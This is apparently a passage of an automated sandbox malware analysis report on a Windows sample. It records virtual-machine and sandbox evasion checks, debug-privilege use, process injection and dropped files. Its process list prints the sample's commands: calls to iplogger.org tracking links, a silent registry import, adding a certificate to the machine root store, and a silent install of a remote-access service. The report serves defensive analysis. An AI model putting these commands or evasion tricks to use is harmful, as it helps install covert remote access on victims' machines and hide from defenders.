Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1wOdXavtlE.exe PID: 6844, type: MEMORY

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\ProgramData\Immunity\rutserv.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 1968	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 6807	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Window / User API: threadDelayed 761

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6848	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6436	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 660	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2268	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 6440	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 5628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe TID: 3500	Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5236	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6768	Thread sleep count: 71 > 30
Source: C:\Windows\System32\svchost.exe TID: 6272	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,	17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,	19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,	19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	19_2_00641778

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A1628 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

17_2_004A1628

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 31500	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: svchost.exe, 0000000F.00000002.464247410.00000221A32A5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Code function: 23_2_00007FF7D9F52C98 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,

23_2_00007FF7D9F52C98

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

23_2_00007FF7D9F53D48

Enables debug privileges

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process token adjusted: Debug
Source: C:\ProgramData\Immunity\rutserv.exe	Process token adjusted: Debug

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_64882991 SetUnhandledExceptionFilter,	23_2_64882991
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648815C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	23_2_648815C0
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648891FC GetCurrentProcessId,SetUnhandledExceptionFilter,Sleep,	23_2_648891FC
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54A60 SetUnhandledExceptionFilter,	23_2_00007FF7D9F54A60
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00007FF7D9F54D88

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected

Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\ssevs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\sssevs.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_0062F168 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

19_2_0062F168

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_005A502C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

19_2_005A502C

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

19_2_005A41D0

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_00405AC0 cpuid

17_2_00405AC0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	17_2_0040B3B8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_0041E154
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_0041E1A0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0040A840
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_004A0F2C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	19_2_0040CD4C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_0040C1D4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetLocaleInfoW,	19_2_005ED8D0

Queries the installation date of Windows

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the product ID of Windows

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation	Jump to behavior
